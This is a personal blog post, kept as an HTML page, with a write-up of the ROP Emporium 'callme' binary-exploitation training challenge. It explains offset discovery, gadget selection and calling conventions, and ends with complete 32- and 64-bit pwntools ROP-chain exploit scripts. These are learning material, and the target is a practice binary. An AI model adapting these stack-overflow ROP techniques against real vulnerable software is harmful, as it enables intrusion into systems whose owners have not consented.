<!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>ROP Emporium - callme | Parro </title> <meta name="author" content="Parro "> <meta name="description" content="ROP Emporium challenge 3 - callme"> <meta name="keywords" content="jekyll, jekyll-theme, academic-website, portfolio-website"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha256-DF7Zhf293AJxJNTmh5zhoYYIMs2oXitRfBjY+9L//AY=" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/css/mdb.min.css" integrity="sha256-jpjYvU3G3N6nrrBwXJoVEYI/0zw8htfFnhT9ljN3JJw=" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/academicons@1.9.1/css/academicons.min.css" integrity="sha256-i1+4qU2G2860dGGIOJscdC30s9beBXjFfzjWLjBRsBg=" crossorigin="anonymous"> <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700%7CRoboto+Slab:100,300,400,500,700%7CMaterial+Icons"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/jwarby/jekyll-pygments-themes@master/github.css" media="" id="highlight_theme_light"> <link rel="shortcut icon" href="data:image/svg+xml,&lt;svg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20100%20100%22&gt;&lt;text%20y=%22.9em%22%20font-size=%2290%22&gt;%E2%9A%A1&lt;/text&gt;&lt;/svg&gt;"> <link rel="stylesheet" href="/assets/css/main.css"> <link rel="canonical" href="https://parroquet.github.io/blog/2022/callme/"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/jwarby/jekyll-pygments-themes@master/native.css" media="none" id="highlight_theme_dark"> <script src="/assets/js/theme.js"></script> <script src="/assets/js/dark_mode.js"></script> </head> <body class="fixed-top-nav "> <header> <nav id="navbar" class="navbar navbar-light navbar-expand-sm fixed-top"> <div class="container"> <a class="navbar-brand title font-weight-lighter" href="/"><span class="font-weight-bold">Parro </span></a> <button class="navbar-toggler collapsed ml-auto" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar top-bar"></span> <span class="icon-bar middle-bar"></span> <span class="icon-bar bottom-bar"></span> </button> <div class="collapse navbar-collapse text-right" id="navbarNav"> <ul class="navbar-nav ml-auto flex-nowrap"> <li class="nav-item "> <a class="nav-link" href="/">About</a> </li> <li class="nav-item active"> <a class="nav-link" href="/blog/">Blog<span class="sr-only">(current)</span></a> </li> <li class="nav-item "> <a class="nav-link" href="/hackthebox/">Hackthebox</a> </li> <li class="nav-item "> <a class="nav-link" href="/repositories/">Repositories</a> </li> <li class="toggle-container"> <button id="light-toggle" title="Change theme"> <i class="fas fa-moon"></i> <i class="fas fa-sun"></i> </button> </li> </ul> </div> </div> </nav> <progress id="progress" value="0"> <div class="progress-container"> <span class="progress-bar"></span> </div> </progress> </header> <div class="container mt-5"> <div class="post"> <header class="post-header"> <h1 class="post-title">ROP Emporium - callme</h1> <p class="post-meta">December 28, 2022</p> <p class="post-tags"> <a href="/blog/2022"> <i class="fas fa-calendar fa-sm"></i> 2022 </a>   ·   <a href="/blog/tag/formatting"> <i class="fas fa-hashtag fa-sm"></i> formatting</a>   <a href="/blog/tag/links"> <i class="fas fa-hashtag fa-sm"></i> links</a>   <a href="/blog/tag/binexp"> <i class="fas fa-hashtag fa-sm"></i> binexp</a>     ·   <a href="/blog/category/rop"> <i class="fas fa-tag fa-sm"></i> ROP</a>   <a href="/blog/category/gdb"> <i class="fas fa-tag fa-sm"></i> GDB</a>   <a href="/blog/category/pwndbg"> <i class="fas fa-tag fa-sm"></i> pwndbg</a>   <a href="/blog/category/pwntools"> <i class="fas fa-tag fa-sm"></i> pwntools</a>   </p> </header> <article class="post-content"> <h2 id="basic-setup">Basic setup:</h2> <ul> <li>ROPEmporium x86 &amp; x86_64 binaries</li> <li>Ubuntu lab machine</li> <li>GDB &amp; pwndbg</li> <li>pwntools</li> </ul> <p> </p> <h3 id="link-to-challenge">Link to challenge</h3> <p><a href="https://ropemporium.com/challenge/callme.html" rel="external nofollow noopener" target="_blank">https://ropemporium.com/challenge/callme.html</a></p> <p> </p> <h3 id="the-32-bit-solve">The 32 bit solve</h3> <p>The aim of this challenge is to call 3 functions provided through library imports named callme_one, callme_two and callme_three along with 3 specific parameters for each (0xdeadbeef, 0xcafebabe, 0xd00df00d).</p> <p> </p> <p><img src="../../../assets/img/callme_img/1checksec.png" alt="checksec" width="750"></p> <p>The first step is to run <strong>checksec</strong> in order to find protections. Like usual, NX in enabled and partial RELRO exists so a ROP chain is required.</p> <p> </p> <p><img src="../../../assets/img/callme_img/2rabin.png" alt="rabin" width="750"></p> <p>Using the <strong>rabin2</strong> command we can see the strings with the -z flag as well as the imported functions with the -i flag. Here we can see any interesting information in strings we can use as well as addresses of functions we can use in our exploits.</p> <p> </p> <p><img src="../../../assets/img/callme_img/3ghidra.png" alt="ghidra" width="750"> <img src="../../../assets/img/callme_img/5pwnme.png" alt="pwnme" width="750"> <img src="../../../assets/img/callme_img/6useful.png" alt="useful" width="750"></p> <p>Next we can look at Ghidra and understand better how the functions available may work. A buffer overflow can be determined through the pwnme function input fields. We can also see this new function called usefulFunction which includes calls to the functions we need to call within the ROP chain. This is useful as we can use the addresses of these functions for the ROP.</p> <p> </p> <p><img src="../../../assets/img/callme_img/7cyclic.png" alt="cyclic" width="750"></p> <p>Through running the <strong>cyclic 100</strong> command within pwndbg and then running the binary with our cyclic value, we can use this to find the offset by taking the value from the EIP register.</p> <p> </p> <p><img src="../../../assets/img/callme_img/8offset.png" alt="offset" width="750"></p> <p>Using <strong>cyclic -l laaa</strong> we can find the offset is 44 bytes.</p> <p> </p> <p><img src="../../../assets/img/callme_img/9addrcallme.png" alt="addrcallme" width="750"></p> <p>Again by going into pwndbg we can note down the addresses of the callme functions by disassembling usefulFunction.</p> <p> </p> <p><img src="../../../assets/img/callme_img/10order.png" alt="order" width="750"></p> <p>Next we need to determine the order for our ROP chain. As parameters will be called off the stack as we are using 32 bit architecture, we can simply add the offset followed by the callme function call, parameters and repeating this. However, as we repeatedly call the different callme functions, a new stack frame is created each time and the parameters we write to the stack will be overwritten. Therefore, we need a ROP gadget.</p> <p> </p> <p><img src="../../../assets/img/callme_img/11ropgadget.png" alt="gadget" width="750"></p> <p>We need to find a rop gadget which pops values off the stack which would have been written by the new stack frame. This is done by using the <strong>ROPgadget</strong> command. We can see the gadget we need is <strong>pop esi; pop edi; pop ebp; ret</strong> as it will pop 3 values off the stack which matches the amount of parameters we need to pass to each function.</p> <p> </p> <p><img src="../../../assets/img/callme_img/12orderupdated.png" alt="orderupdated" width="750"></p> <p>The order can now be updated placing the gadget before the parameters get put on the stack.</p> <p> </p> <p><img src="../../../assets/img/callme_img/13payloadcallmeone.png" alt="callmeone" width="750"></p> <p>To check we have done this correctly, we can start by trying to call the first function call with our parameters with python2 and using little endian format. As we can see, the program outputs callme_one() called correctly so we know we are on the right path.</p> <p> </p> <p><img src="../../../assets/img/callme_img/14completepayload.png" alt="completepayload" width="750"></p> <p>Finishing the payload, we can see the flag has been printed. The python script for this will be displayed at the end of the post.</p> <p> </p> <h3 id="the-64-bit-solve">The 64 bit solve</h3> <p>The 64 bit architecture handles arguments for system calls differently to 32 bit so our exploit will look slightly different. Parameters used this time will be 0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d.</p> <p> </p> <p>64bit: <img src="../../../assets/img/split_img/1464bitarguments.png" alt="1364bitarguments" width="750"></p> <p>As seen before in previous challenges, the 64 bit architecture requires the arguments to be passed in the registers seen above. This means that we need to use a ROP gadget which is <strong>pop rdi; pop rsi; pop rdx; ret</strong>. This will pop the 3 arguments off the stack and into the correct registers for arg0, arg1 and arg2.</p> <p> </p> <p><img src="../../../assets/img/callme_img/15cyclic.png" alt="cyclic" width="750"></p> <p>Again we can use the cyclic command to find the offset. We take the first 8 bytes of the RSP value overwritten.</p> <p> </p> <p><img src="../../../assets/img/callme_img/16offset.png" alt="offset" width="750"></p> <p>Using the <strong>cyclic -l faaaaaaa</strong> command we can find the offset is 40 bytes.</p> <p> </p> <p><img src="../../../assets/img/callme_img/17gadgets.png" alt="gadgets" width="750"></p> <p>We need to find the new 64 bit address of the callme functions. We can do this by dissasembling the usefulFunction again in pwndbg. Provided is also a new function called usefulGadgets which includes the ROP gadget which will pop the 3 arguments off the stack and into the correct registers <strong>pop rdi ; pop rsi ; pop rdx ; ret</strong>. We can grab the address by disassembling this function or using the command <strong>p usefulGadgets</strong>.</p> <p> </p> <p><img src="../../../assets/img/callme_img/18order.png" alt="order" width="750"></p> <p>The order of the ROP chain will have to be slightly different to the 32 bit architecture version. As the callme functions will be calling parameters off the stack, these can be called last after we have placed the parameters into the correct registers. First we need to call our gadget which will pop the 3 following parameters off the stack and into the correct registers. Then finally, we call the callme function and we should get the flag.</p> <p> </p> <p>Instead of using python2 here manually, we will use the template from previous challenges and create a working python3 script using pwntools to solve the challenge. This is provided below the 32 bit script.</p> <p> </p> <h3 id="the-32-bit-python-script">The 32 bit python script</h3> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="c1">##### SETUP &amp; RUN #####
</span>
<span class="c1">#Define the executable
</span><span class="n">exe</span> <span class="o">=</span> <span class="s">'./callme32'</span>

<span class="c1"># This will automatically get context arch, bits, os etc
</span><span class="n">elf</span> <span class="o">=</span> <span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">exe</span><span class="p">,</span> <span class="n">checksec</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>

<span class="c1"># verbose logging so we can see what is being sent
</span><span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s">'info'</span>

<span class="c1">#delete corefiles after crash occurs
</span><span class="n">context</span><span class="p">.</span><span class="n">delete_corefiles</span> <span class="o">=</span> <span class="bp">True</span>

<span class="c1"># run the elf
</span><span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">()</span>

<span class="c1">##### FIND USEFUL ADDRESSES #####
</span>
<span class="c1"># Locate the functions/strings we need - either do this manually or using pwntools
</span>
<span class="c1"># Address needed to put parameters in registers
</span><span class="n">pop</span> <span class="o">=</span> <span class="mh">0x080487f9</span>
<span class="n">callmeone</span> <span class="o">=</span> <span class="mh">0x80484f0</span>
<span class="n">callmetwo</span> <span class="o">=</span> <span class="mh">0x8048550</span>
<span class="n">callmethree</span> <span class="o">=</span> <span class="mh">0x80484e0</span>
<span class="n">param1</span> <span class="o">=</span> <span class="mh">0xdeadbeef</span>
<span class="n">param2</span> <span class="o">=</span> <span class="mh">0xcafebabe</span>
<span class="n">param3</span> <span class="o">=</span> <span class="mh">0xd00df00d</span>


<span class="c1">##### FIND CRASH OVERWRITE RETURN ADDRESS OFFSET #####
</span>
<span class="c1"># We will send a 'cyclic' pattern which overwrites the return address on the stack
</span><span class="n">payload</span> <span class="o">=</span> <span class="n">cyclic</span><span class="p">(</span><span class="mi">100</span><span class="p">)</span>

<span class="c1"># Send cyclic pattern to crash it
</span><span class="n">io</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt; '</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>

<span class="c1"># Wait for the process to crash
</span><span class="n">io</span><span class="p">.</span><span class="n">wait</span><span class="p">()</span>

<span class="c1"># Open up the corefile created after crash
</span><span class="n">core</span> <span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">corefile</span>

<span class="c1"># Print out the address of EIP at the time of crashing
</span><span class="n">eip_value</span> <span class="o">=</span> <span class="n">core</span><span class="p">.</span><span class="n">eip</span>
<span class="n">eip_offset</span> <span class="o">=</span> <span class="n">cyclic_find</span><span class="p">(</span><span class="n">eip_value</span><span class="p">)</span>
<span class="n">info</span><span class="p">(</span><span class="s">'located EIP offset at {a}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">a</span><span class="o">=</span><span class="n">eip_offset</span><span class="p">))</span>

<span class="c1">##### CRAFTING PAYLOAD #####
</span>
<span class="c1"># fit works below by making it aaa + addr1 + addr2 + addr3 and converts hex to ascii where appropriate
</span><span class="n">payload</span> <span class="o">=</span> <span class="n">fit</span><span class="p">({</span><span class="n">eip_offset</span><span class="p">:</span> <span class="p">[</span><span class="n">callmeone</span><span class="p">,</span> <span class="n">pop</span><span class="p">,</span> <span class="n">param1</span><span class="p">,</span> <span class="n">param2</span><span class="p">,</span> <span class="n">param3</span><span class="p">,</span> <span class="n">callmetwo</span><span class="p">,</span> <span class="n">pop</span><span class="p">,</span> <span class="n">param1</span><span class="p">,</span> <span class="n">param2</span><span class="p">,</span> <span class="n">param3</span><span class="p">,</span> <span class="n">callmethree</span><span class="p">,</span> <span class="n">pop</span><span class="p">,</span> <span class="n">param1</span><span class="p">,</span> <span class="n">param2</span><span class="p">,</span> <span class="n">param3</span><span class="p">]})</span>

<span class="c1"># alternative way - p32 converts 0x90 to \x90
# payload = b""
# payload += b'A' * eip_offset
# payload += p32(callmeone)
# payload += p32(pop)
# payload += p32(param1)
# payload += p32(param2)
# payload += p32(param3)
# payload += p32(callmetwo)
# payload += p32(pop)
# payload += p32(param1)
# payload += p32(param2)
# payload += p32(param3)
# payload += p32(callmethree)
# payload += p32(pop)
# payload += p32(param1)
# payload += p32(param2)
# payload += p32(param3)
# print(payload)
</span>

<span class="c1">##### SEND PAYLOAD AND GET FLAG #####
</span>
<span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">()</span>
<span class="n">io</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
<span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'Thank you!</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span>

<span class="c1">#Get our flag!
</span><span class="n">flag</span> <span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">()</span>
<span class="n">success</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>

<span class="c1">##### END #####
</span></code></pre></div></div> <p> </p> <h3 id="the-64-bit-python-script">The 64 bit python script</h3> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="c1">##### SETUP &amp; RUN #####
</span>
<span class="c1">#Define the executable
</span><span class="n">exe</span> <span class="o">=</span> <span class="s">'./callme'</span>

<span class="c1"># This will automatically get context arch, bits, os etc
</span><span class="n">elf</span> <span class="o">=</span> <span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">exe</span><span class="p">,</span> <span class="n">checksec</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>
<span class="c1"># verbose logging so we can see what is being sent
</span><span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s">'info'</span>

<span class="c1">#delete corefiles after crash occurs
</span><span class="n">context</span><span class="p">.</span><span class="n">delete_corefiles</span> <span class="o">=</span> <span class="bp">True</span>

<span class="c1"># run the elf
</span><span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">()</span>

<span class="c1">##### FIND USEFUL ADDRESSES #####
</span>
<span class="c1"># Locate the functions/strings we need - either do this manually or using pwntools
</span>
<span class="c1"># rop = ROP(elf)
# register_pop_gadget = rop.find_gadget(["pop rdi", "pop rsi", "pop rdx", "ret"])[0]
</span><span class="n">pop_gadget</span> <span class="o">=</span> <span class="mh">0x000000000040093c</span>
<span class="n">param1</span> <span class="o">=</span> <span class="mh">0xdeadbeefdeadbeef</span>
<span class="n">param2</span> <span class="o">=</span> <span class="mh">0xcafebabecafebabe</span>
<span class="n">param3</span> <span class="o">=</span> <span class="mh">0xd00df00dd00df00d</span>
<span class="n">callmeone</span> <span class="o">=</span> <span class="mh">0x0000000000400720</span>
<span class="n">callmetwo</span> <span class="o">=</span> <span class="mh">0x0000000000400740</span>
<span class="n">callmethree</span> <span class="o">=</span> <span class="mh">0x00000000004006f0</span>


<span class="c1"># Print out the target address
</span><span class="n">info</span><span class="p">(</span><span class="s">"%#x pop rdi; ret;"</span><span class="p">,</span> <span class="n">pop_gadget</span><span class="p">)</span>
<span class="n">info</span><span class="p">(</span><span class="s">"%#x param1"</span><span class="p">,</span> <span class="n">param1</span><span class="p">)</span>
<span class="n">info</span><span class="p">(</span><span class="s">"%#x param2"</span><span class="p">,</span> <span class="n">param2</span><span class="p">)</span>
<span class="n">info</span><span class="p">(</span><span class="s">"%#x param3"</span><span class="p">,</span> <span class="n">param3</span><span class="p">)</span>
<span class="n">info</span><span class="p">(</span><span class="s">"%#x callmeone"</span><span class="p">,</span> <span class="n">callmeone</span><span class="p">)</span>
<span class="n">info</span><span class="p">(</span><span class="s">"%#x callmetwo"</span><span class="p">,</span> <span class="n">callmetwo</span><span class="p">)</span>
<span class="n">info</span><span class="p">(</span><span class="s">"%#x callmethree"</span><span class="p">,</span> <span class="n">callmethree</span><span class="p">)</span>


<span class="c1">##### FIND CRASH OVERWRITE RETURN ADDRESS OFFSET #####
</span>
<span class="c1"># We will send a 'cyclic' pattern which overwrites the return address on the stack
</span><span class="n">payload</span> <span class="o">=</span> <span class="n">cyclic</span><span class="p">(</span><span class="mi">100</span><span class="p">)</span>

<span class="c1"># Send cyclic pattern to crash it
</span><span class="n">io</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt; '</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>

<span class="c1"># Wait for the process to crash
</span><span class="n">io</span><span class="p">.</span><span class="n">wait</span><span class="p">()</span>

<span class="c1"># Open up the corefile created after crash
</span><span class="n">core</span> <span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">corefile</span>

<span class="n">stack</span> <span class="o">=</span> <span class="n">core</span><span class="p">.</span><span class="n">rsp</span>
<span class="n">info</span><span class="p">(</span><span class="s">"%#x stack"</span><span class="p">,</span> <span class="n">stack</span><span class="p">)</span>

<span class="c1"># Read four bytes from RSP, which will be some of our cyclic data.
# With this snippet of the pattern, we know the exact offset from
# the beginning of our controlled data to the return address.
</span><span class="n">pattern</span> <span class="o">=</span> <span class="n">core</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="n">stack</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span>
<span class="n">offset</span> <span class="o">=</span> <span class="n">cyclic_find</span><span class="p">(</span><span class="n">pattern</span><span class="p">)</span>
<span class="n">info</span><span class="p">(</span><span class="s">"%r pattern (offset: %r)"</span><span class="p">,</span> <span class="n">pattern</span><span class="p">,</span> <span class="n">offset</span><span class="p">)</span>

<span class="c1">##### CRAFTING PAYLOAD #####
</span>
<span class="c1"># Note that we have to call pop_rdi gadget here
</span>
<span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">""</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">'A'</span> <span class="o">*</span> <span class="n">offset</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_gadget</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">param1</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">param2</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">param3</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">callmeone</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_gadget</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">param1</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">param2</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">param3</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">callmetwo</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_gadget</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">param1</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">param2</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">param3</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">callmethree</span><span class="p">)</span>

<span class="c1">##### SEND PAYLOAD AND GET FLAG #####
</span>


<span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">()</span>
<span class="n">io</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'&gt; '</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
<span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'Thank you!</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span>
<span class="c1">#Get our flag!
</span><span class="n">flag</span> <span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">()</span>
<span class="n">success</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>

<span class="c1">##### END #####
</span></code></pre></div></div> </article> </div> </div> <footer class="fixed-bottom"> <div class="container mt-0"> © Copyright 2023 Parro . Powered by <a href="https://jekyllrb.com/" target="_blank" rel="external nofollow noopener">Jekyll</a> with <a href="https://github.com/alshedivat/al-folio" rel="external nofollow noopener" target="_blank">al-folio</a> theme. Hosted by <a href="https://pages.github.com/" target="_blank" rel="external nofollow noopener">GitHub Pages</a>. Photos from <a href="https://unsplash.com" target="_blank" rel="external nofollow noopener">Unsplash</a>. </div> </footer> <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js" integrity="sha256-fgLAgv7fyCGopR/gBNq2iW3ZKIdqIcyshnUULC4vex8=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/js/mdb.min.js" integrity="sha256-NdbiivsvWt7VYCt6hYNT3h/th9vSTL4EDWeGs5SN3DA=" crossorigin="anonymous"></script> <script defer src="https://cdn.jsdelivr.net/npm/masonry-layout@4.2.2/dist/masonry.pkgd.min.js" integrity="sha256-Nn1q/fx0H7SNLZMQ5Hw5JLaTRZp0yILA/FRexe19VdI=" crossorigin="anonymous"></script> <script defer src="https://cdn.jsdelivr.net/npm/imagesloaded@4/imagesloaded.pkgd.min.js"></script> <script defer src="/assets/js/masonry.js" type="text/javascript"></script> <script defer src="https://cdn.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js" integrity="sha256-EdPgYcPk/IIrw7FYeuJQexva49pVRZNmt3LculEr7zM=" crossorigin="anonymous"></script> <script defer src="/assets/js/zoom.js"></script> <script defer src="/assets/js/common.js"></script> <script type="text/javascript">window.MathJax={tex:{tags:"ams"}};</script> <script defer type="text/javascript" id="MathJax-script" src="https://cdn.jsdelivr.net/npm/mathjax@3.2.0/es5/tex-mml-chtml.js"></script> <script defer src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script> <script type="text/javascript">function progressBarSetup(){"max"in document.createElement("progress")?(initializeProgressElement(),$(document).on("scroll",function(){progressBar.attr({value:getCurrentScrollPosition()})}),$(window).on("resize",initializeProgressElement)):(resizeProgressBar(),$(document).on("scroll",resizeProgressBar),$(window).on("resize",resizeProgressBar))}function getCurrentScrollPosition(){return $(window).scrollTop()}function initializeProgressElement(){let e=$("#navbar").outerHeight(!0);$("body").css({"padding-top":e}),$("progress-container").css({"padding-top":e}),progressBar.css({top:e}),progressBar.attr({max:getDistanceToScroll(),value:getCurrentScrollPosition()})}function getDistanceToScroll(){return $(document).height()-$(window).height()}function resizeProgressBar(){progressBar.css({width:getWidthPercentage()+"%"})}function getWidthPercentage(){return getCurrentScrollPosition()/getDistanceToScroll()*100}const progressBar=$("#progress");window.onload=function(){setTimeout(progressBarSetup,50)};</script> </body> </html>